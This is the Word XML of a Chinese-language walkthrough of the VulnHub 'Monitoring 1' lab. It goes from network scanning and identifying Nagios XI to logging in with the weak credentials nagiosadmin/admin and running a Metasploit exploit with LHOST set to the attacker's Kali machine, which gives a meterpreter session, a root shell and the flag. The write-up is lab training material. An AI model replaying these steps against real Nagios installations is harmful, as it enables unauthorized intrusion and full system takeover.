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9F91F" w14:textId="6380AA1A" w:rsidR="00F34E1A" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x00:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0A8448" w14:textId="00E401A6" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7B1B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00BA398E">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/monitoring-1,555/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="461FE3BE" w14:textId="2B7FA708" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>难度:非常简单建议用V</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存放，目标是获得root权限去读取f</w:t>
      </w:r>
      <w:r>
        <w:t>lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABBE132" w14:textId="5B37A563" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7758DF4C" wp14:editId="0CADC179">
            <wp:extent cx="5274310" cy="1082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ABBF" w14:textId="558D18F7" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B"/>
    <w:p w14:paraId="21038D7B" w14:textId="57C8F955" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载完以后是个.</w:t>
      </w:r>
      <w:r>
        <w:t>ova</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54122724" w14:textId="370FED26" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1371E069" wp14:editId="7572255A">
            <wp:extent cx="5274310" cy="222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A397" w14:textId="54C66C3B" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B"/>
    <w:p w14:paraId="5B330180" w14:textId="60402A43" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双击点开，找个地方存放即可，调回N</w:t>
      </w:r>
      <w:r>
        <w:t>AT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式就可以运行了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0E4AAE" w14:textId="18A2268E" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54867647" wp14:editId="1D399886">
            <wp:extent cx="3029106" cy="22289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E3BD" w14:textId="4AC943FE" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B"/>
    <w:p w14:paraId="26424D67" w14:textId="44D8CDD4" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x01:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探测靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5D153B" w14:textId="328466C9" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先用n</w:t>
      </w:r>
      <w:r>
        <w:t>etdiscover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确认靶机ip先，排除.</w:t>
      </w:r>
      <w:r>
        <w:t>1,.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和.</w:t>
      </w:r>
      <w:r>
        <w:t>254</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以确认靶机I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为192.168.19.133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C67E990" w14:textId="3F810B9D" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>netdiscover -r 192.168.19.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A753F6" w14:textId="4B8E0C90" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39934ABC" wp14:editId="3974A942">
            <wp:extent cx="4267419" cy="13018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C402" w14:textId="6DEE0D47" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B"/>
    <w:p w14:paraId="608050C8" w14:textId="2A297A85" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后开始用Nmap探测波端口,主要开了22，25，80，389和443端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A968CE0" w14:textId="2E74F23F" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>nmap -A -sS -sV -v -p- 192.168.19.133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577E2225" w14:textId="144E0E65" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EA6DD61" wp14:editId="0342D128">
            <wp:extent cx="5274310" cy="23958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F683" w14:textId="0D5883BA" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B"/>
    <w:p w14:paraId="17C23DE8" w14:textId="219BFC7E" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问波I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以正常回显，开搞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783232DB" w14:textId="6E614F5F" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47F2615F" wp14:editId="46DB83EF">
            <wp:extent cx="3683189" cy="240042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F0C4" w14:textId="0990BB8C" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B"/>
    <w:p w14:paraId="1077A55B" w14:textId="3702FE3C" w:rsidR="004D7B1B" w:rsidRDefault="004D7B1B" w:rsidP="004D7B1B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x02:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挖掘漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E01EFD" w14:textId="6FB1BE74" w:rsidR="004D7B1B" w:rsidRDefault="00E66D69" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于访问I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候有个大大的N</w:t>
      </w:r>
      <w:r>
        <w:t>agios XI,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>觉得是一个C</w:t>
      </w:r>
      <w:r>
        <w:t>MS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用whatweb求证了一下确实是个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>MS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不过版本未知</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104FA083" w14:textId="10E460DA" w:rsidR="00E66D69" w:rsidRDefault="00E66D69" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="382EE975" wp14:editId="1B6D47BB">
            <wp:extent cx="5274310" cy="552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56A6" w14:textId="3FEFE333" w:rsidR="00E66D69" w:rsidRDefault="00E66D69" w:rsidP="004D7B1B"/>
    <w:p w14:paraId="70EBEC4C" w14:textId="1BB9B374" w:rsidR="00E66D69" w:rsidRDefault="00E66D69" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动M</w:t>
      </w:r>
      <w:r>
        <w:t>SF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用search找到点p</w:t>
      </w:r>
      <w:r>
        <w:t>ayload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E263CC3" w14:textId="371E1CCB" w:rsidR="00E66D69" w:rsidRDefault="004E6273" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19436B25" wp14:editId="36CF0A6D">
            <wp:extent cx="5274310" cy="10947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C680" w14:textId="175B2662" w:rsidR="00E66D69" w:rsidRDefault="00E66D69" w:rsidP="004D7B1B"/>
    <w:p w14:paraId="1EDC4263" w14:textId="6F2B46E4" w:rsidR="00E66D69" w:rsidRPr="006F53E2" w:rsidRDefault="00E66D69" w:rsidP="006F53E2">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不过先返回去先，点完access以后会有个登录界面</w:t>
      </w:r>
      <w:r w:rsidR="006F53E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这里尝试了抓包S</w:t>
      </w:r>
      <w:r w:rsidR="006F53E2">
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidR="006F53E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入有点小慢，用它的默认用户名</w:t>
      </w:r>
      <w:r w:rsidR="006F53E2" w:rsidRPr="006F53E2">
        <w:t>nagiosadmin</w:t>
      </w:r>
      <w:r w:rsidR="006F53E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配相同密码失败，然而配a</w:t>
      </w:r>
      <w:r w:rsidR="006F53E2">
        <w:t>dmin</w:t>
      </w:r>
      <w:r w:rsidR="006F53E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>却成功了。。。。。。。。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5755533C" w14:textId="557B5459" w:rsidR="00E66D69" w:rsidRDefault="00E66D69" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D210F9A" wp14:editId="44FE7ED4">
            <wp:extent cx="4007056" cy="3289469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AE2C" w14:textId="67825BB4" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B"/>
    <w:p w14:paraId="0F04E9E0" w14:textId="4A8CF5EA" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B"/>
    <w:p w14:paraId="1CC2ED0C" w14:textId="617C005B" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD06852" w14:textId="6D2684B0" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="374A0EAE" wp14:editId="363D283D">
            <wp:extent cx="5274310" cy="28124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47C6" w14:textId="5677965F" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B"/>
    <w:p w14:paraId="44D0939A" w14:textId="4C1E7E54" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后回到M</w:t>
      </w:r>
      <w:r>
        <w:t>SF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用第一个即序列0payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E1286B" w14:textId="18DE0D47" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>set RHOSTS 192.168.19.133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B026D3" w14:textId="264ED6BF" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B">
      <w:r>
        <w:tab/>
        <w:t>Set PASSWORD admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EE670D" w14:textId="101EC77D" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Set LHOST 192.168.19.134(kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的I</w:t>
      </w:r>
      <w:r>
        <w:t>P)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FAC3A5" w14:textId="07D7D158" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E278D29" wp14:editId="3621DCC0">
            <wp:extent cx="5270771" cy="2851297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C2A7" w14:textId="77FCC2FD" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B"/>
    <w:p w14:paraId="36D14DBF" w14:textId="57526DD2" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了m</w:t>
      </w:r>
      <w:r>
        <w:t>eterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是代表运行成功了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D3302A" w14:textId="104C007C" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58BA61A0" wp14:editId="169BF46D">
            <wp:extent cx="5274310" cy="14389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5DCD" w14:textId="5887D6A4" w:rsidR="006F53E2" w:rsidRDefault="006F53E2" w:rsidP="004D7B1B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>输入shell然后再打一个python的交互shell直接发现是root权限不用提权直接读flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C86BA7C" w14:textId="19181061" w:rsidR="006F53E2" w:rsidRPr="004D7B1B" w:rsidRDefault="006F53E2" w:rsidP="004D7B1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B3912EF" wp14:editId="3E8B24BA">
            <wp:extent cx="5274310" cy="15417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3E2" w:rsidRPr="004D7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4246B" w14:textId="77777777" w:rsidR="006B60AA" w:rsidRDefault="006B60AA" w:rsidP="004D7B1B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5AD8FA63" w14:textId="77777777" w:rsidR="006B60AA" w:rsidRDefault="006B60AA" w:rsidP="004D7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F5CCB" w14:textId="77777777" w:rsidR="006B60AA" w:rsidRDefault="006B60AA" w:rsidP="004D7B1B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7E6018A5" w14:textId="77777777" w:rsidR="006B60AA" w:rsidRDefault="006B60AA" w:rsidP="004D7B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53"/>
    <w:rsid w:val="004D7B1B"/>
    <w:rsid w:val="004E6273"/>
    <w:rsid w:val="00567B53"/>
    <w:rsid w:val="006B60AA"/>
    <w:rsid w:val="006F53E2"/>
    <w:rsid w:val="007318B4"/>
    <w:rsid w:val="00E66D69"/>
    <w:rsid w:val="00F3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27D8A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A20605E6-9C90-4F4C-BCB4-2EF3458F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B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B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B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D7B1B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D7B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D7B1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F53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F53E2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6F5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3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ulnhub.com/entry/monitoring-1,555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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>wangc</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-24T13:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-24T14:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>